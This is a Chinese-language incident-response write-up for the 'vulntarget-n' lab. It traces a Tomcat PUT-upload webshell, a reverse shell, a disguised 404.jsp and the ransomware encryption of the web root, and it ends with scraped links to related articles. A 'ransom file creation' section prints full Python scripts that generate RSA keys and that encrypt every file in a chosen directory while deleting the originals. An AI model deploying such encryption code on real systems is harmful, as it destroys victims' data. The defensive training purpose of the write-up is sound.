vulntarget-n

用户名密码:root/Vulntarget@123

一.分析history命令

1.先将历史命令导出

history > 1.txt

2.分析history

1)篡改网页

2)将木马文件进行伪装

3)创建公钥私钥,加密方式为rsa

4)拷贝公钥到指定目录,将该目录下文件进行勒索加密

二.找到加密私钥进行解密

find . -name *key*.pem     #在根目录下全局搜索公钥

将公钥私钥以及加密文件内容放到rsa解密

注,将404.jsp文件进行解密后发现文件为jsp马。

三.检查日志

1.tomcat日志文件路径存放于 /opt/tomcat/logs

由于攻击行为可能存在上传木马行为,重点查看post、put请求下,状态码为200的请求内容。

tail -n 5000 localhost_access_log.2024-06-04.txt | grep "2*" | grep "PUT"

上传jsp马后,执行了whoami

4.漏洞复现

复习一下tomcat文件上传漏洞

put请求下上传一个jsp小马,使用蚁剑连接。

5.攻击过程

1.利用tomcat历史漏洞(文件上传漏洞)上传vulntarget.jsp马。

2.反弹shell拿到root权限。

3.将jsp马伪装成404.jsp文件。

4.创建勒索文件,使用rsa加密,生成公钥私钥。

5.使用python,对ROOT路径下的文件进行rsa加密。

6.删除加密脚本,做痕迹清除。

其他

1.了解重要配置文件

/opt/tomcat/conf/server.xml #该文件为tomcat配置文件,可以实现更改端口,设置虚拟主机,配置SSL等

2.勒索文件制作

1.制作公钥私钥

mkdir keys #创建一个文件夹,用于存放公钥私钥。

vim get_pem.py #编写公钥私钥生成脚本

python3 get_pem.py #运行脚本,生成公私钥

常见生成公私钥脚本如下:

import rsa

import os

# 确保 keys 文件夹存在

os.makedirs("./keys", exist_ok=True)

# 生成 RSA 密钥对

pub, priv = rsa.newkeys(2048)  # 建议使用 2048 位密钥

# 保存公钥

try:

    pub = pub.save_pkcs1()

    with open("./keys/pubkey.pem", mode="wb") as file:

        file.write(pub)

    print("公钥保存成功:./keys/pubkey.pem")

except Exception as e:

    print(f"保存公钥时出错:{e}")

# 保存私钥

try:

    priv = priv.save_pkcs1()

    with open("./keys/privkey.pem", mode="wb") as file:

        file.write(priv)

    print("私钥保存成功:./keys/privkey.pem")

except Exception as e:

    print(f"保存私钥时出错:{e}")

2.准备加密工作

cp keys/pubkey.pem /opt/tomcat/webapps/ROOT #将公钥放到网页webapps目录下

vim flag.jsp #创建flag.jsp文件

vim encrypt_vulntarget.py #创建加密脚本,对当前目录下的jsp文件都进行加密

常见加密脚本如下:

##获取文件路径

def list(src):

    res = []

    for root, dirs, files in os.walk(src): #获取父目录,子目录,文件

        for file in files:

            # 获取文件所属目录

            # print(root)

            # 获取文件路径

            res.append(os.path.join(root, file)) #把父目录和文件合成一个路径

    return res

## 加密

def ran_encode(res):

    for r in res:

        # print(re)

        with open(r, 'rb') as fp:

            src = fp.read()

        bs = base64.b64encode(src).decode()   #读取并用base64加密

        se = ''

        for b in bs:

            new = chr(ord(b) + 5)   #转换成acsii码进行位移

            se += new

        # print(type(re))

        os.remove(r)

        name = '123'

        with open(r+name, 'wb') as fp:   #覆写

            fp.write(se.encode())

## 解密

def ran_decode(res):

    for r in res:

        with open(r, 'r') as fp:

            src = fp.read()

        se = ''

        for b in src:

            new = chr(ord(b) - 5)

            se += new

        resp = base64.b64decode(se)

        s=r[0:-3]

        os.remove(r)

        with open(s,'wb') as fp:

            fp.write(resp)

path=r"需要勒索的目录,绝对路径"

def intes():

    res=list(path)

    ran_encode(res)

def outs():

    src1 = list(path)

    ran_decode(src1)

加解密常见脚本

##加密

def encrypt_file(file_path, public_key_path):

    # 加载公钥

    with open(public_key_path, "rb") as f:

        public_key = rsa.PublicKey.load_pkcs1(f.read())

    # 读取文件内容

    with open(file_path, "rb") as f:

        file_content = f.read()

    # 加密文件内容

    encrypted_content = rsa.encrypt(file_content, public_key)

    # 保存加密后的文件

    encrypted_file_path = file_path + ".enc"

    with open(encrypted_file_path, "wb") as f:

        f.write(encrypted_content)

    print(f"文件已加密并保存到 {encrypted_file_path}")

    return encrypted_file_path

# 示例:加密文件

encrypt_file("example.txt", "public_key.pem")

##解密

def decrypt_file(encrypted_file_path, private_key_path):

    # 加载私钥

    with open(private_key_path, "rb") as f:

        private_key = rsa.PrivateKey.load_pkcs1(f.read())

    # 读取加密后的文件内容

    with open(encrypted_file_path, "rb") as f:

        encrypted_content = f.read()

    # 解密文件内容

    decrypted_content = rsa.decrypt(encrypted_content, private_key)

    # 保存解密后的文件

    decrypted_file_path = encrypted_file_path.replace(".enc", "_decrypted")

    with open(decrypted_file_path, "wb") as f:

        f.write(decrypted_content)

    print(f"文件已解密并保存到 {decrypted_file_path}")

# 示例:解密文件

decrypt_file("example.txt.enc", "private_key.pem")

应急响应靶场之vulntarget-n的更多相关文章

  1. 一些关于Linux入侵应急响应的碎碎念

    近半年做了很多应急响应项目,针对黑客入侵.但疲于没有时间来总结一些常用的东西,寄希望用这篇博文分享一些安全工程师在处理应急响应时常见的套路,因为方面众多可能有些杂碎. 个人认为入侵响应的核心无外乎四个 ...

  2. Linux安全事件应急响应排查方法总结

    Linux安全事件应急响应排查方法总结 Linux是服务器操作系统中最常用的操作系统,因为其拥有高性能.高扩展性.高安全性,受到了越来越多的运维人员追捧.但是针对Linux服务器操作系统的安全事件也非 ...

  3. Windows应急响应常识

    Windows 应急响应 常见事件ID 1102 清理审计日志 4624 账号登陆成功 4625 账号登陆失败 4672 授予特殊权限 4720 创建用户 4726 删除用户 4728 将成员添加到启 ...

  4. Window应急响应(五):ARP病毒

    0x00 前言 ARP病毒并不是某一种病毒的名称,而是对利用arp协议的漏洞进行传播的一类病毒的总称,目前在局域网中较为常见.发作的时候会向全网发送伪造的ARP数据包,严重干扰全网的正常运行,其危害甚 ...

  5. Window应急响应(一):FTP暴力破解

    0x00 前言 ​ FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护.日常源码备份等.如果攻击者通过FTP匿名访问或者弱口令获取FTP权限,可直接上传 ...

  6. Window应急响应(二):蠕虫病毒

    0x00 前言 ​ 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序. 常见的 ...

  7. Window应急响应(三):勒索病毒

    0x00 前言 ​ 勒索病毒,是一种新型电脑病毒,主要以邮件.程序木马.网页挂马的形式进行传播.该病毒性质恶劣.危害极大,一旦感染将给用户带来无法估量的损失.这种病毒利用各种加密算法对文件进行加密,被 ...

  8. Window应急响应(四):挖矿病毒

    0x00 前言 ​ 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一.病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升 ...

  9. windows应急响应入侵排查思路

    0x00 前言 ​ 当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解 ...

  10. Linux应急响应入侵排查思路

    0x00 前言 ​ 当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解 ...

随机推荐

  1. k8s calico-node错误日志 listen tcp: lookup localhost on 8.8.4.4:53: no such host

    项目场景:K8s搭建 问题描述:查看pods状态,发现 calico-node异常[root@k8s-master ~]# kubectl get pods --all-namespacesNAMES ...

  2. Shell三元表达式

    Shell三元表达式   shell能否实现三元表达式呢?像下面这样: int a = (b == 5) ? c : d; 实现方法: a=$([ "$b" == 5 ] & ...

  3. ubuntu更换conda的源

    ubuntu更换conda的源有两种方法:一.使用命令行更换Conda源至国内镜像站点.二.直接创建并编辑编辑conda的配置文件.condarc. 一.使用命令行更换Conda源至国内镜像站点 要在 ...

  4. .Net程序员机会来了,微软官方新推出一个面向Windows开发者本地运行AI模型的开源工具

    想要开发AI产品的.Net程序员机会来了,这个项目应该好好研究. 虽然说大模型基本都有提供网络API,但肯定没有直接使用本地模型速度快. 最近微软官方新推出AI Dev Gallery开源项目,可以帮 ...

  5. 关于vue加element-ui上传文件获取文件的sha256的值 第二篇 更改压缩包编码错误

    这个依然需要插件crypto-js 首先下载引入 import CryptoJs from "crypto-js"; 话不多说直接上代码,首先是element的上传 <el- ...

  6. [.NET] 使用客户端缓存提高API性能

    使用客户端缓存提高API性能 摘要 在现代应用程序中,性能始终是一个关键的考虑因素.无论是提高响应速度,降低延迟,还是减轻服务器负载,开发者都在寻找各种方法来优化他们的API.在Web开发中,利用客户 ...

  7. 微服务实战系列(六)-网关springcloud zuul-copy

    1. 场景描述 今天接着介绍springcloud,今天介绍下springcloud的路由网关-Zuul,外围系统或者用户通过网关访问服务,网关通过注册中心找到对应提供服务的客户端,网关也需要到注册中 ...

  8. ubuntu配置笔记

    一.ubuntu的mnt/hgfs下共享文件夹设置 1.确认VMware Tools和共享目录设定已经完成,安装vmware tool sudo apt-get install open-vm-too ...

  9. oracle数据导入导出,备份还原命令expdp&impdp(只导出元数据,不导出表数据,最全,最完善的步骤)

    感谢金龙鱼先生分享,原文来自https://blog.csdn.net/kou869929526/article/details/125791113 一,编码要求以及数据库版本要求 检查数据库版本(用 ...

  10. Netty实战入门教程

    概述 Netty 是一个异步的.基于事件驱动的网络应用框架,用于快速开发可维护.高性能的网络服务器和客户端 Netty 在 Java 网络应用框架中的地位就好比:Spring 框架在 JavaEE 开 ...